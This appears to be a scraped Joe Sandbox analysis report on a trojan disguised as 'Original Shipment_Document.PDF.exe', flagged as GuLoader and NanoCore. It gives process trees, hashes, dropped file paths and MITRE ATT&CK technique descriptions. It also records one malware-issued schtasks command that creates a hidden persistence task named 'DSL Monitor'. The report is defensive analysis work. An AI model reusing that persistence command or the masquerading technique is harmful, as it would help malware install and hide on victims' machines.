Programmed in:	C, C++ or other language

Analysis Process: Conhost.exePID: 3292, Parent PID: 3060

General

Target ID:	130
Start time:	11:32:29
Start date:	05/08/2022
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Analysis Process: CasPol.exePID: 4156, Parent PID: 2660

General

Target ID:	136
Start time:	11:32:42
Start date:	05/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Original Shipment_Document.PDF.exe"
Imagebase:	0xa50000
File size:	106496 bytes
MD5 hash:	7BAE06CBE364BB42B8C34FCFB90E3EBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000088.00000000.185799522780.0000000000E30000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

Analysis Process: conhost.exePID: 5560, Parent PID: 4156

General

Target ID:	137
Start time:	11:32:42
Start date:	05/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff752620000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: schtasks.exePID: 908, Parent PID: 4156

General

Target ID:	138
Start time:	11:32:58
Start date:	05/08/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp6DD1.tmp
Imagebase:	0x880000
File size:	187904 bytes
MD5 hash:	478BEAEC1C3A9417272BC8964ADD1CEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2212, Parent PID: 908

General

Target ID:	139
Start time:	11:32:58
Start date:	05/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff752620000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: CasPol.exePID: 6004, Parent PID: 1364

General

Target ID:	140
Start time:	11:32:59
Start date:	05/08/2022
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
Imagebase:	0x7c0000
File size:	106496 bytes
MD5 hash:	7BAE06CBE364BB42B8C34FCFB90E3EBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exePID: 5856, Parent PID: 6004

General

Target ID:	141
Start time:	11:32:59
Start date:	05/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff752620000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Original Shipment_Document.PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

AV Detection

E-Banking Fraud

Stealing of Sensitive Information

Remote Access Functionality

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\caspol.exe.log

C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\nsExec.dll

C:\Users\user\AppData\Local\Temp\subfolder1\windows.exe

C:\Users\user\AppData\Local\Temp\tmp6DD1.tmp

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\catalog.dat

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\settings.bin

Windows Analysis Report
Original Shipment_Document.PDF.exe

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre